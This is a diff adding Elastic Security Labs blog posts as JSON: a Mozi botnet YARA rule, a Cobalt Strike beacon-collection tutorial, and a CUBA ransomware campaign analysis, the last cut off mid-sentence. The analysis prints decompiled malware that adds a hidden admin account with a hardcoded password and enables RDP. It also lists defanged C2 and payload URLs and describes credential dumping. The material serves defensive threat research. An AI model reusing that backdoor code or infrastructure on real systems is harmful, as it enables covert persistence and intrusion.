search:\n\n\n\nOther search examples over response data could be used as well such as the actual bytes of the malicious Mozi file that was returned in the response.\n\n## Mitigation\n\nThe Mozi botnet propagates through the abuse of default or weak remote access passwords, exploits and outdated software versions. To defend devices from exploitation, we recommend:\n\n- Changing the device default remote access passphrases\n- Updating devices to the latest firmware and software version supported by the vendor\n- Segmenting IoT devices from the rest of your internal network\n- Not making IoT devices accessible from the public Internet\n\n## Detection logic\n\nUsing [YARA](https://virustotal.github.io/yara/), we can write a signature for the corrupted UPX header. Similar to rules that look for specific types of PowerShell obfuscation, the obfuscation mechanism itself can occasionally be a better indicator of maliciousness than attempting to signature the underlying activity. It is extremely important to note that zeroing out part of the header sections was the technique that we observed with our samples. There are a litany of other obfuscation and anti-analysis techniques that could be used with other samples. MITRE ATT&CK® describes additional subtechniques for the [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027/) technique from the [Defense Evasion](https://attack.mitre.org/tactics/TA0005) tactic.As noted above, the observed anti-analysis technique used by the analyzed Mozi samples consists solely of zeroing out the 8 bytes after the “UPX!” magic bytes, and the 4 bytes before that are always zero, so let's use a YARA signature derived from the work by [Lars Wallenborn](https://blag.nullteilerfrei.de/2019/12/26/upx-packed-elf-binaries-of-the-peer-to-peer-botnet-family-mozi/) (expanded for readability).\n\n```\nrule Mozi_Obfuscation_Technique\n{\n meta:\n author = \"Elastic Security, Lars Wallenborn (@larsborn)\"\n description = \"Detects obfuscation technique used by Mozi botnet.\"\n strings:\n $a = { 55 50 58 21\n [4]\n 00 00 00 00\n 00 00 00 00\n 00 00 00 00 }\n condition:\n all of them\n}\n```\n\n_Code block 16 - YARA signature detecting Mozi obfuscation_\n\n- 55 50 58 21 - identifies the UPX magic bytes\n- [4] - offset by 4 bytes, the l_lsize, l_version & l_format\n- 00 00 00 00 - identifies the program header ID\n- 00 00 00 00 - identifies the zero’d out p_filesize\n- 00 00 00 00 - identifies the zero’d out p_blocksize\n- condition - requires that all of the above strings exist for a positive YARA signature match\n\nThe above YARA signature can be used to identify ELF files that are packed with UPX and have the header ID, p_filesize, and p_blocksize elements zero’d out. This can go a long way in identifying obfuscation techniques in addition to Mozi samples. In our testing, we used this YARA signature with a 94.6% efficiency for detecting Mozi samples.\n\n## Summary\n\nThe Mozi botnet has been observed targeting vulnerable Internet of Things (IoT) devices to launch seemingly non-targeted campaigns that can take advantage of the force multiplication provided by a botnet. Mozi has been in operation since at least December 2019.\n\nWe covered techniques to collect, ingest, and analyze samples from the Mozi botnet. These methodologies can also be leveraged to enhance and enable analytical processes for other data samples.\n\n## Additional resources\n\n- Blog artifacts and scripts, Elastic: [https://github.com/elastic/examples/tree/master/blog/mozin-about](https://github.com/elastic/examples/tree/master/blog/mozin-about)\n- ThreatFox Indicator of Compromise Database, Abuse.ch: [https://threatfox.abuse.ch/browse](https://threatfox.abuse.ch/browse)\n- UPX Anti-Unpacking Techniques in IoT Malware, CUJOAI: [https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware](https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware)\n- Corrupted UPX Packed ELF Repair, vcodispot.com: [https://vcodispot.com/corrupted-upx-packed-elf-repair](https://vcodispot.com/corrupted-upx-packed-elf-repair)\n- UPX PACKED ELF BINARIES OF THE PEER-TO-PEER BOTNET FAMILY MOZI, Lars Wallenborn: [https://blag.nullteilerfrei.de/2019/12/26/upx-packed-elf-binaries-of-the-peer-to-peer-botnet-family-mozi](https://blag.nullteilerfrei.de/2019/12/26/upx-packed-elf-binaries-of-the-peer-to-peer-botnet-family-mozi)\n- Mozi, Another Botnet Using DHT, 360 Netlab: [https://blog.netlab.360.com/mozi-another-botnet-using-dht](https://blog.netlab.360.com/mozi-another-botnet-using-dht)\n- Mozi Botnet Accounts for Majority of IoT Traffic, Tara Seals: [https://threatpost.com/mozi-botnet-majority-iot-traffic/159337](https://threatpost.com/mozi-botnet-majority-iot-traffic/159337)\n- New Mozi P2P Botnet Takes Over Netgear, D-Link, Huawei Routers, Sergiu Gatlan: [https://www.bleepingcomputer.com/news/security/new-mozi-p2p-botnet-takes-over-netgear-d-link-huawei-routers](https://www.bleepingcomputer.com/news/security/new-mozi-p2p-botnet-takes-over-netgear-d-link-huawei-routers)\n- Kibana Maps, Elastic: [https://www.elastic.co/guide/en/kibana/current/maps.html](https://www.elastic.co/guide/en/kibana/current/maps.html)\n- Kibana Lens, Elastic: [https://www.elastic.co/guide/en/kibana/current/lens.html](https://www.elastic.co/guide/en/kibana/current/lens.html)\n"
+ },
+ "title": "Collecting and operationalizing threat data from the Mozi botnet",
+ "slug": "collecting-and-operationalizing-threat-data-from-the-mozi-botnet",
+ "date": "2022-06-02",
+ "description": "The Mozi botnet is an ongoing malware campaign targeting unsecured and vulnerable networking devices. This post will showcase the analyst journey of collecting, analyzing, and operationalizing threat data from the Mozi botnet.",
+ "author": [
+ {
+ "slug": "andrew-pease"
+ },
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "derek-ditch"
+ },
+ {
+ "slug": "daniel-stepanic"
+ }
+ ],
+ "image": "blog-thumb-mozi-botnet.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-collecting_and_operationalizing_threat_data_from_the_mozi_botnet-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-collecting_cobalt_strike_beacons_with_the_elastic_stack-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-collecting_cobalt_strike_beacons_with_the_elastic_stack-md.json
new file mode 100644
index 00000000000..701d9169ab9
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-collecting_cobalt_strike_beacons_with_the_elastic_stack-md.json
@@ -0,0 +1,38 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Collecting Cobalt Strike Beacons with the Elastic Stack\"\nslug: \"collecting-cobalt-strike-beacons-with-the-elastic-stack\"\ndate: \"2022-06-01\"\ndescription: \"Part 1 - Processes and technology needed to extract Cobalt Strike implant beacons\"\nauthor:\n - slug: derek-ditch\n - slug: daniel-stepanic\n - slug: seth-goodwin\n - slug: andrew-pease\nimage: \"photo-edited-01@2x.jpg\"\ncategory:\n - slug: attack-pattern\ntags:\n - tutorial\n - cobalt strike\n - fleet\n---\n\n## Overview\n\n[Cobalt Strike](https://attack.mitre.org/software/S0154/) is a premium offensive security tool leveraged by penetration testers and red team members as a way to emulate adversary behavior. The goal is to validate security detection capabilities and processes replicating a real-world intrusion. While Cobalt Strike is a legitimate tool, it is often [abused by actual threat actors](https://www.proofpoint.com/uk/blog/threat-insight/cobalt-strike-favorite-tool-apt-crimeware) as a way to gain and maintain persistence into targeted networks.\n\nTo manage command and control, Cobalt Strike leverages an implant that uses beacon configuration known as a [Malleable Command and Control](https://www.cobaltstrike.com/help-malleable-c2) (Malleable C2) profile. A Malleable C2 profile contains a tremendous number of options to configure the beacon’s functionality, please see [Cobalt Strike’s official documentation](https://www.cobaltstrike.com/help-beacon) for specifics on configuring Malleable C2 beacons.\n\nThis blog will focus on using the Elastic Stack to collect Cobalt Strike beacon payloads, extract and parse the beacon configurations, and an analysis of the metadata within the configurations. This will all be taken from the memory of targeted Windows endpoints that we’ve collected from our telemetry.\n\n## The Fleet Policy\n\n[Fleet](https://www.elastic.co/guide/en/kibana/current/fleet.html) is an app in Kibana that provides a central place to configure and monitor your Elastic Agents. Fleet uses [integrations](https://www.elastic.co/guide/en/fleet/current/integrations.html), which are unified plugins that allow data to be collected from apps and services, and then stored in Elasticsearch. Integrations are added to policies, and Elastic Agents are added to policies.\n\nFirst, we need to configure the collection of shellcode and malicious memory regions in a Fleet policy. This will collect 4MB of data from memory surrounding shellcode and malicious memory events. It should be noted that this collection may significantly increase the amount of data stored in Elasticsearch.\n\nYou can add this to an existing policy or create a new policy. To create a new policy, in Kibana, navigate to Fleet → Agent Policies → Create agent policy. Give your policy a name and description. Optionally, you can disable “System monitoring” and “Agent monitoring” to reduce the amount of system and agent metadata collected from your endpoints. Click on “Create agent policy”.\n\n\n\nNext, click on your new policy and click the “Add integration button.\n\n\n\nFinally, we’re going to add the memory and shellcode collection options. Click on the integration name (“Endpoint Security”).\n\n\n\nUnder “Protections”, leave the different protection types selected, but change the Protection level from “Prevent” to “Detect”. This will allow malware to continue to run to allow for more rich event collection. There are several types of Protections (Malware, Memory, etc.), select “Detect” for each type that has Windows as an available “Operating system”; you can uncheck Mac and Linux Operating Systems. **If you are enabling this feature for a production environment, leave the Protection levels as “Prevent”**\n\n\n\nAt the bottom of the integration configuration page, you can toggle “Register as antivirus” so that the Elastic Agent is registered as the Antivirus solution, and disable Windows Defender. Click on “Show advanced settings”.\n\n\n\nAt the very bottom of the advanced settings page, type “true” for the windows.advanced.memory_protection.shellcode_collect_sample and windows.advanced.memory_protection.memory_scan_collect_sample settings, and then click “Save integration”.\n\n\n\nOnce you have created this specific Fleet policy, you can apply this policy to an endpoint running the Elastic Agent. For specific instructions on how to deploy the Elastic Agent, refer to the [official Elastic documentation](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html#install-fleet-managed-agent).\n\n## Collecting the Beacon\n\nNow that we’ve made a collection policy and applied it to a Windows machine you can target it with a CobaltStrike campaign. Instead of mimicking what a CobaltStrike beacon could look like in a lab, we’re going to use live CobaltStrike beacon payloads from Elastic’s telemetry.\n\nTo find Cobalt Strike beacon payloads, you can use the Discover app in Kibana to return events identified as Cobalt Strike. These events are provided by the Elastic Endpoint Security Agent, which identifies Cobalt Strike beacons and modules with the “Windows.Trojan.CobaltStrike” malware signature. A simple [Kibana Query Language (KQL)](https://www.elastic.co/guide/en/kibana/current/kuery-query.html) search is as simple as:\n\n```\nKQL search for Cobalt Strike\n\nevent.category:(malware or intrusion_detection) and\nrule.name:(Windows.Trojan.CobaltStrike or Windows.Trojan.Cobaltstrike)\n```\n\n\n\nNext, let’s filter on documents that have the process.Ext.memory_region.bytes_compressed field (this is a field populated by the windows.advanced.memory_protection.shellcode_collect_sample and windows.advanced.memory_protection.memory_scan_collect_sample settings we configured in the Fleet policy above). To do that we can simply add a filter for the process.Ext.memory_region.bytes_compressed_present field with a value of true.\n\n\n\nFinally, add the process.Ext.memory_region.bytes_compressed field to our view so that we can see the value of the field.\n\n\n\nWe can see that we have 133 examples with data in the process.Ext.memory_region.bytes_compressed field. This field contains the file extracted from the memory of the infected host and then zlib deflated and Base64 encoded.\n\n\n\nNow that we’ve collected the file in the Elastic Stack, let’s turn that raw data into a file that we can analyze.\n\nThere is a lot of nuance between operating systems on how to decode Base64 and inflate zlib deflated files. If you’d prefer to use your command line or local tools, feel free to do so. That said, [CyberChef](https://gchq.github.io/CyberChef) is a browser-based data parser that is provided for free by the United Kingdom’s Government Communications Headquarters (GCHQ).\n\nUsing the CyberChef web application, add the “From Base64” and “Zlib Inflate” [recipes]()and then paste the contents of the process.Ext.memory_region.bytes_compressed field into the ).\n\nClick on the disk icon to download the inflated binary.\n\n\n\nRunning the file command, we can see that this is a Portable Executable (PE) file that can be analyzed by a malware reverse engineer (RE).\n\n```\nUsing the file command to validate the file type\n\n$ file beacon.exe\n\nbeacon.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows\n\n\n```\n\nWhile an RE can identify a tremendous amount of information, let’s explore what additional information a non-RE can obtain from this file.\n\n## Next Steps\n\nIn the next [release](https://www.elastic.co/security-labs/extracting-cobalt-strike-beacon-configurations), we’ll use the beacon that we’ve just collected and extract its configuration. With this information, we’ll be able to identify other important elements such as license identifications, watermarks, and atomic indicators.\n"
+ },
+ "title": "Collecting Cobalt Strike Beacons with the Elastic Stack",
+ "slug": "collecting-cobalt-strike-beacons-with-the-elastic-stack",
+ "date": "2022-06-01",
+ "description": "Part 1 - Processes and technology needed to extract Cobalt Strike implant beacons",
+ "author": [
+ {
+ "slug": "derek-ditch"
+ },
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "photo-edited-01@2x.jpg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ }
+ ],
+ "tags": [
+ "tutorial",
+ "cobalt strike",
+ "fleet"
+ ]
+ },
+ "id": "security_labs_content-collecting_cobalt_strike_beacons_with_the_elastic_stack-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cuba_ransomware_campaign_analysis-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cuba_ransomware_campaign_analysis-md.json
new file mode 100644
index 00000000000..622fbdd742c
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cuba_ransomware_campaign_analysis-md.json
@@ -0,0 +1,41 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"CUBA Ransomware Campaign Analysis\"\nslug: \"cuba-ransomware-campaign-analysis\"\ndate: \"2022-09-08\"\ndescription: \"Elastic Security observed a ransomware and extortion campaign leveraging a combination of offensive security tools, LOLBAS, and exploits to deliver the CUBA ransomware malware.\"\nauthor:\n - slug: daniel-stepanic\n - slug: derek-ditch\n - slug: seth-goodwin\n - slug: salim-bitam\n - slug: andrew-pease\nimage: \"blog-thumb-hard-drives.jpg\"\ncategory:\n - slug: campaigns\ntags:\n - ref9019\n - cuba\n - ransomware\n---\n\n## Key Takeaways\n\n- The Elastic Security Team is tracking an organized and financially-motivated ransomware and extortion group called Cuba Ransomware\n- Cuba Ransomware targets small and medium-sized retailers, exfiltrating sensitive information, and then deploying ransomware\n- Cuba Ransomware uses a “name and shame” approach by releasing exfiltrated data as an additional method to extort ransomware cryptocurrency payments\n- We are releasing a YARA signature and providing hunting queries that detect this ransomware family\n\n> For information on the CUBA ransomware campaign and associated malware analysis, check out our blog posts detailing this:\n>\n> - [CUBA Malware Analysis](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis)\n> - [BUGHATCH Malware Analysis](https://www.elastic.co/security-labs/bughatch-malware-analysis)\n\n## Preamble\n\nThe Elastic Security Team is tracking a threat group that is leveraging the Cuba Ransomware, combined with data exfiltration and extortion, to target North American and European retailers and manufacturers for cryptocurrency payments. The threat group has followed an effective, but repetitive cluster of TTPs for initial access, lateral movement, exfiltration, ransomware deployment, and extortion.\n\n## Initial Access\n\nThe incidents that we have observed included hosts that were infected with a litany of initial access opportunities. These included everything from potentially unwanted programs (PUP) to remotely executable vulnerabilities. Because of this, we cannot verify what the initial access vehicle was, but there are two theories:\n\n- An access broker\n- A remotely exploitable vulnerability\n\nWhile there are many ways to gain access into a targeted network, we’ll explore the most likely hypotheses for how the CUBA threat group gained access.\n\n### Access Broker\n\nAs an introduction, an access broker is a threat group who, as they move through the [kill chain](https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html), has their “actions on objective” as collecting and maintaining remote access into a targeted network so that access can be sold to other threat groups who have other goals.\n\nThis is a common tactic for ransomware campaigns where the goal is to rapidly encrypt and extort victims into paying to recover data. When using ransomware kits (ransomware-as-a-service), the threat actors are often focused on moving rapidly across many victims and not on the reconnaissance required to identify and exploit victims to deploy their ransomware.\n\nRansomware-as-a-service includes a lot of overhead such as negotiating with victims, troubleshooting unlock procedures, and managing the crypto infrastructure. It is often easier to purchase previously exploited systems that allow the ransomware campaign owners to be “shell wranglers” instead of needing to gain and maintain access to a large number of environments.\n\nThe theory that an initial access broker may have been used began percolating because we observed access attempts using an Exchange vulnerability in multiple contested networks; however, all networks did not receive the CUBA ransomware. Additionally, we observed initial access attempts in January but did not observe CUBA ransomware until March which would align with an access broker gaining and maintaining persistence while shopping for a buyer.\n\nIn the environments where the CUBA ransomware was not deployed, the incident response was rapid, however incomplete, and access was regained. Once the persistence was observed, the adversary was successfully evicted and CUBA was never deployed.\n\n### Remotely Exploitable Vulnerability\n\nWe observed the execution of the ProxyLogon exploit. [Previous research](https://www.mandiant.com/resources/unc2596-cuba-ransomware) has observed this threat group leveraging [ProxyLogon](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855) and [ProxyShell](https://www.mandiant.com/resources/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers) vulnerabilities to gain initial access.\n\n```\nc:\\windows\\system32\\inetsrv\\w3wp.exe, -ap, MSExchangeOWAAppPool, -v, v4.0, -c, C:\\Program Files\\Microsoft\\Exchange Server\\V15\\bin\\GenericAppPoolConfigWithGCServerEnabledFalse.config, -a, \\\\.\\pipe\\[redacted], -h, C:\\inetpub\\temp\\apppools\\MSExchangeOWAAppPool\\MSExchangeOWAAppPool.config, -w, (empty), -m, 0\n```\n\nIn each case REF9019 activity was traced back to Windows servers running Microsoft’s Exchange Server. Although we do not have information on the patch levels of those machines at the time of the execution or the exact vulnerabilities exploited, there is corroborating evidence regarding the exploitation of publicly accessible Exchange servers at this time generally, as well as specific reporting tied to the CUBA threat actor exploiting them.\n\nThis information combined with the lack of activity preceding this event, as well as the order of tactics after, indicates that in both cases exploitation of publicly accessible Exchange servers initiated the compromise.\n\n> While analyzing certain alerts throughout these events, we used data present in the process.Ext.memory_region.bytes_compressed field, and the technique we described in our [Cobalt Strike series](https://www.elastic.co/security-labs/collecting-cobalt-strike-beacons-with-the-elastic-stack), to extract the memory-resident binaries and shellcode.\n\n## Establish Foothold\n\n### afk.ttf\n\nThis exploitation attempt preceded one primary infection by about 6 weeks. It appears a tactics shift occurred in the intervening period.\n\nThe file afk.ttf has been identified as a variant of “ZenPak” by some vendors on VirusTotal. ZenPak is categorized as a generic Trojan which has been associated with the Bazar malware family. The BazarBackdoor has a long history and was recently sighted in ransomware-as-a-service campaigns.\n\nInitially, afk.ttf was identified through a malicious_file alert when it was created by the IIS worker process (w3wp.exe) handling the Exchange Service.\n\n\n\nThe afk.ttf file is a 64-bit Windows DLL that has a single export, bkfkals. Next, afk.ttf is loaded by rundll32.exe (spawned by w3wp.exe) which unpacks shellcode in memory and executes it. The unpacked shellcode is a Meterpreter payload from the offensive security framework, [Metasploit](https://github.com/rapid7/metasploit-framework).\n\n\n\nFollowing this, afk.ttf uses an injection technique that allows the injected code to run before the entry point of the main thread of the process. This is known as [Early Bird injection](https://www.cyberbit.com/endpoint-security/new-early-bird-code-injection-technique-discovered/) and is used in this situation to inject the shellcode in a suspended process for nslookup 8.8.8.8. Once the shellcode was deobfuscated for execution, the Elastic Agent identified and prevented the Metasploit payload.\n\n\n\nUsing the process.Ext.memory_region.bytes_compressed field we were able to recover the memory snapshot from these two alerts and verified that the shellcode was Meterpreter, which is part of the Metasploit framework. Additionally, we were able to extract the C2 IP (159.203.70[.]39) and URI (/Time/cb6zubbpio...truncated...).\n\n\n\nUltimately this foothold was either never established, or abandoned because there is no further activity from this endpoint until it is re-exploited about 6 weeks later.\n\n### add2.exe\n\nThe primary execution chain of both infections started with a malicious_file alert that fired upon the creation and execution of add2.exe by the IIS worker process handling the Exchange service. This was the same technique observed previously with the afk.ttf attempt. Interestingly, these executions happened within about 15 minutes of each other on victims in different countries and different industry verticals.\n\n\n\nThe Elastic Malware Analysis and Reverse Engineering (MARE) team was able to [find this file in VirusTotal](https://www.virustotal.com/gui/file/728994be6b928de3d1c7b49ca1c79db8656c1cf4b95a1e508a6be48c6ab407da/detection) and pull it down for binary analysis.\n\n```\nBOOL sub_4013B0()\n{\n int v1;\n int v2;\n WCHAR REMOTE_DESKTOP_USERS_groups_list[256];\n WCHAR ADMINS_groups_list[256];\n char password[44];\n wchar_t username[9];\n v2 = enum_local_groups(DOMAIN_ALIAS_RID_ADMINS, ADMINS_groups_list);\n v1 = enum_local_groups(DOMAIN_ALIAS_RID_REMOTE_DESKTOP_USERS, REMOTE_DESKTOP_USERS_groups_list);\n if ( v2 || v1 )\n {\n wcscpy(username, L\"Mysql\");\n qmemcpy(password, L\"KJaoifhLOaiwdhadx1@!\", 0x2Au);\n if ( Add_user((int)username, (int)password) )\n {\n if ( v2 )\n add_user_groups(ADMINS_groups_list, (int)username);\n if ( v1 )\n add_user_groups(REMOTE_DESKTOP_USERS_groups_list, (int)username);\n hide_accountName(username); SpecialAccounts\\\\UserList regkey\n }\n }\n return enable_RDP();\n}\n```\n\nMARE determined that this executable performs several functions:\n\nEnumerates local administrator and RDP groups.\n\n```\n WCHAR REMOTE_DESKTOP_USERS_groups_list[256];\n WCHAR ADMINS_groups_list[256];\n char password[44];\n wchar_t username[9];\n v2 = enum_local_groups(DOMAIN_ALIAS_RID_ADMINS, ADMINS_groups_list);\n v1 = enum_local_groups(DOMAIN_ALIAS_RID_REMOTE_DESKTOP_USERS, REMOTE_DESKTOP_USERS_groups_list);\n if ( v2 || v1 )\n```\n\nCreates a new user Mysql, sets the password to KJaoifhLOaiwdhadx1@!, and sets no expiration date (0x2Au).\n\n```\n wcscpy(username, L\"Mysql\");\n qmemcpy(password, L\"KJaoifhLOaiwdhadx1@!\", 0x2Au);\n if ( Add_user((int)username, (int)password) )\n```\n\nAdds this user to the previously enumerated local administrative and RDP groups.\n\n```\n if ( v2 )\n add_user_groups(ADMINS_groups_list, (int)username);\n if ( v1 )\n add_user_groups(REMOTE_DESKTOP_USERS_groups_list, (int)username);\n```\n\nSets the SpecialAccounts\\UserList regkey for this user to hide the user from login screens and the control panel.\n\n```\n hide_accountName(username); regkey\n```\n\nEnables RDP by setting the `fDenyTSConnections` value to false in the Registry.\n\n```\nreturn enable_RDP();\n```\n\nIn total, add2.exe establishes local persistence via a hidden user and opening of a remote access service. This enables the REF9019 actor to connect back to this machine in case of discovery, patching of the vulnerability, or an incomplete eviction.\n\nAdditionally, VirusTotal indicated on the [graph page](https://www.virustotal.com/graph/728994be6b928de3d1c7b49ca1c79db8656c1cf4b95a1e508a6be48c6ab407da) that this file has been hosted at `http://208.76.253[.]84`.\n\nOf particular note, within the strings of add2.exe, we identified a unique program database file (PDB) named AddUser.pdb. PDB files are used to map elements of source code to the compiled program.\n\n\n\nSearching in VirusTotal for the HEX value of F:\\Source\\WorkNew17\\ (content:\\{463a5c536f757263655c576f726b4e65773137\\}), we identified another file named ad.exe which shared the same folder structure, and included another PDB file, CmdDLL.pdb.\n\n\n\nVirusTotal shows on the [graph page](https://www.virustotal.com/graph/http%253A%252F%252F108.170.31.115%252Fadd.dll) that this file has been hosted at `http://108.170.31[.]115/add.dll``. While we did not observe add.dll, we believe they are related and have included the name, hash, and IP in our Observables table as the IP address (108.170.31[.]115) was also [reported](https://www.virustotal.com/gui/ip-address/108.170.31.115/relations) distributing ra.exe (see the NetSupport section below).\n\nUsing this same search criteria, we were able to locate [three](https://any.run/report/bd270853db17f94c2b8e4bd9fa089756a147ed45cbc44d6c2b0c78f361978906/e1579345-7571-4dcb-af4c-e74a4a81d804) [other](https://any.run/report/2213db3f856cbed85a52cfa0275fa6eaba8e852a7e78449ab469d85d1945dc80/ed6077c3-6e2a-4f74-a761-cc0a354cc159) [files](https://www.joesandbox.com/analysis/417560/1/html) with the same PDB debugging artifacts.[SystemBC](https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc) is a socks5 backdoor with the ability to communicate over TOR.\n\n## Remote Access Tools\n\nAfter establishing a beachhead, REF9019 dropped tooling to manage the post-exploitation phase of the attacks. Notably all tools were not present in each attack. It’s unclear if the decision to use one tool over another was merely driven by preference of individual operators, or if there was an operational factor that contributed to the decision.\n\n### SystemBC\n\n[SystemBC](https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc) is a socks5 backdoor with the ability to communicate over TOR.\n\nIt was identified via malware_signature alerts that ran after SystemBC was injected into a svchost.exe process.\n\n\n\nPost processing of the compressed_bytes of the shellcode_thread alert exposed network indicators our sample utilized, including its command and control server (104.217.8[.]100:5050).\n\n> Check out AhnLab’s ASEC blog for [detailed coverage of SystemBC’s features](https://asec.ahnlab.com/en/33600/).\n\nLet’s look at the data for the SystemBC binary that was collected from the process.Ext.memory_region.bytes_compressed field.\n\n\n\nIf we run this through the strings command, it becomes a bit more readable. As mentioned above, the work done by the team at ASEC does a tremendous job of describing the SystemBC remote access tool, so we’ll focus on the atomic indicators that we observed.\n\n```\n…truncated…\nBEGINDATA\nHOST1:104.217.8[.]100\nHOST2:104.217.8[.]100\nPORT1:5050\n…truncated…\n193.23.244[.]244\n86.59.21[.]38\n199.58.81[.]140\n204.13.164[.]118\n194.109.206[.]212\n131.188.40[.]189\n154.35.175[.]225\n171.25.193[.]9\n128.31.0[.]34\n128.31.0[.]39\n/tor/status-vote/current/consensus\n/tor/server/fp/\n…truncated…\n```\n\nThe values of HOST1 and HOST2 are [well-documented](https://bazaar.abuse.ch/sample/6b36e8569a8b6150d760c3cfa1f23ff6072d2ab3bedd3633dc269ea6fd5fff9e/)[ infrastructure](https://otx.alienvault.com/indicator/file/b9446c5f3fb7dd19e9f495d88431df2f0899ecb2) for the SystemBC tool. The list of 10 IP addresses is Tor [directory authorities](https://metrics.torproject.org/glossary.html#directory-authority). One IP address is selected from the list to get the [consensus data](https://metrics.torproject.org/glossary.html#consensus) for the Tor network. Then it will start Tor communications based on the settings it received (as previously reported by ASEC).\n\nWhile we were not able to identify if Tor traffic was executed, this could have been a clandestine way to exfiltrate sensitive data.\n\n### GoToAssist\n\n[GoToAssist](https://en.wikipedia.org/wiki/RescueAssist) is a remote desktop support application with some legitimate usage, but also known for its use in tech support scams.In this incident, it was used to download a malicious DLL to the newly created user’s downloads directory (C:\\Users\\Mysql\\Downloads\\94-79.dll). We were unable to collect this file and have not observed it later in the incident, however previous reporting has indicated use in CUBA campaigns of DLLs with similar naming conventions.\n\n\n\n### NetSupport\n\nNetSupport Manager is another client-server remote desktop management application. In this incident, NetSupport was named ra.exe and was written and executed from the C:\\programdata\\ directory by the previously exploited IIS worker process (w3wp.exe). ra.exe has been distributed by a previously identified IP address (see add2.exe section above).\n\n\n\nOur sample is the [NetSupportManager RAT](https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat) as indicated on [VirusTotal](https://www.virustotal.com/gui/file/5669f6a48dac80717fa5770fa3be6c18022a7633b996ccf0df6b468994085378) and corroborates [prior reporting](https://www.mandiant.com/resources/unc2596-cuba-ransomware) of its usage with the CUBA Ransomware group.When analyzing the process data that we extracted from memory we can see that\n\n### Cobalt Strike\n\nCobalt Strike was used in these intrusions, we confirmed this while reviewing the value of the [Target.process.thread.Ext.start_address_bytes](https://docs.elastic.co/en/integrations/endpoint) (a few (typically 32) raw opcode bytes at the thread start address, hex-encoded). Upon doing this, we observed bytes commonly observed in Cobalt Strike payloads.\n\nWhen analyzing the process data that we extracted from memory we can see that dhl.jpg (from mvnetworking[.]com) and temp.png (from bluetechsupply[.]com) are being used for command and control. This is corroborated by [previous ](https://twitter.com/drb_ra/status/1482117406122201095)[research](https://www.darktrace.com/en/inside-the-soc/how-antigena-intercepted-and-delayed-a-cobalt-strike-intrusion/).\n\n\n\n\n\nLooking at the domains in Shodan ([[1](https://www.shodan.io/search?query=mvnetworking.com)][[2](https://www.shodan.io/search?query=bluetechsupply.com)]), we can see that they are both categorized as Cobalt Strike beacon C2 infrastructure.\n\n\n\n\n\nBoth sites are hosted by a cloud provider, Hivelocity, Inc. We have requested the domains be taken down.\n\n### BUGHATCH\n\nBUGHATCH is the name given to a Cuba Ransomware associated downloader by Mandiant in their blog on [UNC2596](https://www.mandiant.com/resources/unc2596-cuba-ransomware). We detail the observed execution chain and indicators below.\n\nBUGHATCH was launched via PowerShell script stagers in both cases. One execution was following the dropping of a malicious DLL to the Mysql user’s downloads folder (C:\\Users\\Mysql\\Downloads\\14931s.dll). Download URI for the next stage was found in the Target.process.Ext.memory_region.strings (`http://64.235.39[.]82/Agent32.bin`).\n\n\n\nIn the above example, we observed agsyst82.ps1 downloading Agent32.bin from 64.235.39[.]82, but were unable to collect the PowerShell script. However, while performing open-source research, we identified a PowerShell script on ANY.RUN that performed network connections to the same IP and URL (`http://64.235.39[.]82/Agent32.bin`). The script is named komar.ps1 in ANY.RUN’s analysis. We are associating these two PowerShell scripts and network activity together.\n\n\n\nThe other PowerShell script was called by a malicious file, cps.exe. This PowerShell script is called komar2.ps1 and downloads Agent32.bin from 38.108.119[.]121.\n\n\n\nkomar2.ps1 next attempts to inject itself into svchost.exe from C:\\Windows\\Sysnative\\svchost.exe.\n\n\n\n> For context, the C:\\Windows\\Sysnative path is a legitimate Windows directory and used to allow 32-bit applications to access the System32 folder on a 64-bit version of Windows. This path has also been observed as a [SpawnTo parameter](https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/) in Cobalt Strike process injection configurations.\n\nThis new injected process again executes komar2.ps1 and includes a new PDB entry of F:\\Source\\Mosquito\\Agent\\x64\\Release\\Agent.pdb. As we discussed above, “komar” means “mosquito” in Polish and is a good indicator as a way to identify other related entities; we see “Mosquito” in the path of the PDB. While a weak association by itself, the PDB in this sample is located in F:\\Source\\, which is the same location that we’d observed with F:\\Source\\WorkNew## above for add2.exe. By themselves, they are not a solid reference point between the two samples, but when compared together, they can be categorized as “interesting”.\n\nBased on analysis of the Agent32.bin file, we believe that this is the BUGHATCH malware. BUGHATCH has been observed being used as a downloader in CUBA ransomware incidents. This aligns to how we observed Agent32.bin. BUGHATCH has been [covered in the UNC2596 blog](https://www.mandiant.com/resources/unc2596-cuba-ransomware) by the team at Mandiant.\n\n## Credential Harvesting, Internal Reconnaissance, and Lateral Movement\n\nCredential harvesting was observed through process injection into the GoToAssistUnattendedUi.exe binaries. These appear to be the legitimate files for the Go To Assist suite. The credential harvesting was accomplished by using Meterpreter and Mimikatz.\n\n### Meterpreter\n\nAs we observed in the initial infection several months prior, Meterpreter was observed being used to collect the SAM database using the [hashdump 